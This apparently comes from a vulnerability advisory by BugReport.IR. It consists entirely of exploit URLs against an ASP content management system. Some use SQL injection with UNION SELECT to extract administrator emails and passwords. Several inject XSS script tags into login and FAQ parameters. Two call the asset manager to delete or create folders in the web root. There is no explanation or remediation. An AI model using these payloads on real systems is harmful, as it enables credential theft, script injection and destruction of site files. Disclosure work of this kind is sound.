http://www.example.com/ansFAQ.asp?id=-2 union select email,password from 
[user] where email like &#039;%25admin%25&#039;
http://www.example.com/ansFAQ.asp?id=1&amp;topic=&lt;/title&gt;&lt;script&gt;alert(&#039;sdl 
BugReport.IR XSS&#039;)&lt;/script&gt;
http://www.example.com/ansFAQ.asp?id=1&amp;button=&quot;&gt;&lt;script&gt;alert(&#039;sdl 
BugReport.IR XSS&#039;)&lt;/script&gt;
http://www.example.com/preview.asp?template_id=-1 union select 
1,&#039;[%25menu%25]&#039; as 
date_created,email%2b&#039;&lt;br&gt;&#039;%2bpassword,user.*,user.*,1,2,3,4,5 from 
[user] where email like &#039;%25admin%25&#039;
http://www.example.com/cms/assetmanager/folderdel_.asp?inpCurrFolder=C:\InetPub\wwwroot\
http://www.example.com/cms/assetmanager/foldernew.asp?inpCurrFolder=c:\inetpub\wwwroot\&amp;inpNewFolderName=test2008
http://www.example.com/login.asp?id=1&quot;&gt;&lt;script&gt;alert(&#039;sdl BugReport.ir 
XSS&#039;)&lt;/script&gt;
http://www.example.com/login.asp?txtEmail=1&quot;&gt;&lt;script&gt;alert(&#039;sdl 
BugReport.ir XSS&#039;)&lt;/script&gt;